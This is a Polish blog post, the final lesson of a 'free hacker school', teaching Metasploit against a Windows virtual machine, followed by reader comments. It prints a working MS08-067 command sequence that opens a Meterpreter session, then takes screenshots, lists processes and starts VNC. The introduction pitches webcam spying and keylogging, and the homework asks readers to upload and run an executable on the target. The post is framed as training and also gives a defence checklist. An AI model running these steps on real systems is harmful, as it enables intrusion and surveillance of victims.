Lekcja 6: Jak (s)penetrować system Windows

Dzisiaj czas już na ostatni wpis z cyklu darmowej szkoły hakerów. Nic się nie zmieniło, nadal potrzebujemy systemu Kali Linux i Windows postawionych jako wirtualne maszyny (VMware i VirtualBox). Dzisiaj poznasz moc drzemiącą w potężnym frameworku metasploit, dowiesz się czym jest exploit, payload ale i również zobaczysz moc drzemiącą w meterpreterze. Być może chciałbyś mieć podgląd kamerki internetowej Windows 7 drugiej osoby, szukasz keyloggera, zdalnego sniffera lub chciałbyś podejrzeć pulpit ofiary? Dzięki narzędziu do pentestów metasploit jest to możliwe! Pamiętaj o aspekcie prawnym, audyty bezpieczeństwa należy przeprowadzać tylko na swoich komputerach w swojej sieci w celach szkoleniowych.  Aby zostać audytorem bezpieczeństwa należy najpierw poznać ataki z praktycznej strony. Najlepszą obroną jest atak!

Co to jest metasploit- poradnik?

Metasploit framework to zbiór narzędzi służących do przeprowadzania testów bezpieczeństwa (open soruce!). Nie jest dedykowany crackerą a profesjonalistą z branży IT. Dzięki swoim wbudowanym modułom umożliwia automatyzacje i szybkie masowe przeprowadzanie pentestów.

metasploit za pomocą ssh
Zdalne łączenie się z poziomu Windows za pomocą aplikacji Putty z systemem Linux.

Exploit

Exploit – program lub skrypt umożliwiający wykorzystanie pewnej luki w oprogramowaniu na atakowanym systemie. Wiele skryptów wykorzystujących błędy możesz znaleźć na http://www.exploit-db.com. Oczywiście prawdziwi hakerzy i crackerzy sami wyszukują podatności i implementują demonstracyjne aplikacje je wykorzystujące.

Payload

Payload – ładunek jest wykonywany przez atakowany system. Payload w standardowej najpopularniejszej formie umożliwia połączenie się z komputerem ofiary i udostepnia wiersz poleceń. Funkcjonalność ładunku oczywiście nie ogranicza się tylko do tej funkcjonalności (bycia backdoorem).

Auxiliary

Auxiliary Module – zbiór narzędzi dodatkowych. Wiele z nich może posłużyć do identyfikacji oprogramowania, znajdującego się na testowanym serwerze.  Przykład użycia

use auxiliary/scanner/ftp/ftp_version 
set RHOSTS 127.0.0.1-254 
run

Wideo darmowa szkoła hakerów

Poniżej zamieszczany film do ostatniej 6 lekcji naszego kursu pentestera.

>> Pobierz film lekcja 6 szkoła hakerów <<

Pozostałe filmy znajdziesz w naszym dziale wideo / download.

Przykład

Większościowy przebieg dzisiejszego filmiku szkoleniowego pierwszej serii darmowej szkoły hakerów.

msfconsole
exploit/windows/smb/ms08_067_netapi
help search
search cve:CVE-2008-4250
use exploit/windows/smb/ms08_067_netapi
set payload windows/shell/bind_tcp
run
set payload windows/meterpreter/bind_tcp
run
screenshot
ps
run vnc

Jak się bronić bez wiedzy specjalistycznej przed atakami z sieci?


Zróbmy listę, aby było szybciej:

  • aktualizuj na bieżąco system (Windows Update, repozytorium danej dystrybucji Linux)
  • aktualizuj zainstalowane oprogramowanie (szczególnie to sieciowe)
  • zainstaluj oprogramowanie antywirusowe
  • w miarę możliwości używaj firewalla choćby tego systemowego
  • skanuj pliki pochodzące z nieznanych źródeł za pomocą skanerów av online
  • nie odbieraj załączników od nieznajomych (poczta, komunikatory, serwisy społecznościowe)
  • zwracaj uwagę na adresy WWW (strony na których posiadamy konta) i protokół HTTPS
  • jeśli Cię to interesuje to… audytuj od czasu do czasu swój system i spróbuj się do niego włamać a następnie naprawić luki wedle wskazówek z internetu.

 Zadania do dzisiejszej lekcji Metasploit Framework

  1. Spróbuj wykorzystać polecenie upload i download w meterpreter. Więcej informacji znajdziesz zapewne w sieci 🙂
  2. Prześlij na audytowany system dowolny plik wykonywalny exe i uruchom go
  3. W msfconsole wpisz show auxiliary i przeanalizuj wyniki.
  4. Przeskanuj za pomocą Nessusa (poprzednia lekcja) inny system operacyjny i rozejrzyj się za gotowymi lukami które możesz wykorzystać

Podsumowanie

To już koniec pierwszej serii kursu audytora systemów informatycznych. Mamy nadzieje, że tą praktyczną wiedzą zachęciliśmy Ciebie do zgłębiania wiedzy dotyczącej bezpieczeństwa komputerowego. Jeżeli poszukujesz informacji jak włamać się do Windows lub poznać hasło do systemu to zdecydowanie ten kurs nie jest dedykowany dla Ciebie. Chcemy aby każy przyszły haker pentester potrafił zbadać i zabezpieczyć chociaż w podstawowym stopniu każdy popularny system informatyczny.

Jeżeli interesuje Cię metaspolit tutorial to zajrzyj na stronę metaspolit unleashed. Jest do dosyć kompletny podstawowy kurs do tego narzędzia w języku angielskim. Jeżeli chcesz być na bierząco i lubisz nasz blog polecamy polubić Nasz fanpage na fejsie HakerEduPL. Pozdrawiamy :-)!

41 thoughts to “Lekcja 6: Jak (s)penetrować system Windows”

  1. A czy to dziala z windowsem 8.1 bo szukałem w necie i nie dało sie przez żaden sposób dostać ? Mozna prosić o pomoc ?

    1. Nie rozumiem pytania. Czy wirtualna maszyna z Kali Linux i na niej metaspolit działa z Windows 8.1 Tobie chodzi? Tak

    1. Ale Nessus przedstawiony również w tych systemach wykrywa podatności… A używanie narzędzia metasploit za bardzo nie odbiega od tego co pokazaliśmy.

  2. Końcówka -ą używana jest w odniesieniu do liczby pojedynczej, natomiast -om do mnogiej.
    Wielu hakerOM, crackerOM, profesjonalistOM.
    Ktoś może być hakerem, crackerem, profesjonalistĄ. Zwracam uwagę, bo często widzę tu tego typu przejęzyczenia.
    No i przecinki 😉

    1. Po wpisaniu run zaraz po (set payload windows/shell/bind_tcp) wyskakuje mi taki komunikat xploit(ms08_067_netapi) > run

      [*] Started bind handler
      [-] Exploit failed [unreachable]: Rex::ConnectionRefused The connection was refused by the remote host (192.168.0.104:445).

      co mam zrobić?

      1. A da się pingować ten 192.168.0.104, firewall? Myśle że na filmiku jest wszystko baaaaardzo dokładnie wyjaśnione.

  3. Dzięki wielkie za ten poradnik. Na prawdę kawał wielkiej użytecznej roboty. Czekam na kolejne odcinki z tej serii, o ile się pojawią. Pozdrawiam serdecznie.

  4. Tak sobie patrzę, korzystam z kaliego z podanego linku od was z lekcji 1, i tak próbuję dodać expolita do metaspolita i nie udaje mi się to.
    Czy wpływ na to może mieć, że pisze tam ” Free metaspolit pro trial … ” ? Wiem, że to pytanie laika, ale to moje pierwsza styczność z tego typu działaniami. Chciał bym zajmować się bezpieczeństwem i to taki mój zaczątek.
    Pozdrawiam.

    1. Kupić, użyć swojej licencji BOX systemu, uzyskać dostęp z uczelni swojej (program studencki DreamSpark).

  5. [*] Exploit completed but no session was created

    Używałem payload’ów reverse_tcp i bind_tcp, porty 135,139 i 445 są otwarte, skanowałem nessusem, firewall na windowsie jest wyłączony, jest to full spatchowany windows xp service pack 3 i szukałem w necie co zrobić, ale nie znalazłem nic co by działało. Nie chcę zmieniać systemu, bo jakoś ten windows można podziurawić. Proszę o pomoc :-/

      1. Nessus pokazał krytyczną lukę o nie wspieranym systemie, a o portach z Nmapa. Z pozostałego raportu z Nessusa, nic nie wywnioskowałem.

        Rebootowałem systemy, używałem kilku innych exploitów, bawiłem się meterpreterami i ustawieniami. Czasem pokazywał się ten błąd, czasem kończyło się na :
        [*] Checking for vulnerability…

        Czy może zadziałać coś innego?

        1. Po prostu żaden exploit nie działa, a to oczywiste że stary nie wspierany system jest dziurawy. Oba na VM, Siec mostkowa, skan Nmapem: 139,135,445 otwarte, uzywam exploitow na te porty, dokladnie ustawiam, zmieniam payloady i nic
          :-/

          1. Rozumiem że bind_tcp i reverse_tcp też nie działa? A spróbuj jeszcze w nadrzędnym systemie operacyjnym wyłąćzyć firewall. Gdy wykonujesz w konsoli poleceń PING to oba systemy widzą się nawzajem?

  6. Muszę przyznać, że cały ten rozdział od 1-6 to kawał świetnej roboty. Bardzo chętnie zagłębiłbym się w to jeszcze bardziej, bo strasznie mnie to kręci 😉 Dzięki, za to co zrobiłeś i (niczego nie sugerując hah:) ) może będziesz kontynuował 😉 Pozdrówka 😉

    1. Dzięki JJ’aperte. Chcieliśmy kontynuować. Ale zdemotywowało nas ciągłe usuwanie filmów na dailymotion/vimeo/YT itd…

    1. Na tą lukę tak, ale przecież to tylko kurs więc trudno aby zademonstrować kilka milionów podobnego typu exploitów.

    1. Ta tak i umyślnie prezentuje się przestarzałe exploity, chociaż nowsze istnieją i są praktycznie identyczne w użyciu.

  7. Jakie to zabawne, goście przyszli tu po edukację a zwracają facetowi uwagę na pisownie i wymowę. Jak potrzebujesz się dzbanie jeden z drugim wywyższyć wiedzą to zapraszam na kółko miłośników poprawnej pisowni i wymowy. A jak jesteś na tyle dobry żeby zwracać komuś uwagę, załóż własny blog i tam pouczaj swoich czytelników. Dzbanie.

Dodaj komentarz

Twój adres e-mail nie zostanie opublikowany. Wymagane pola są oznaczone *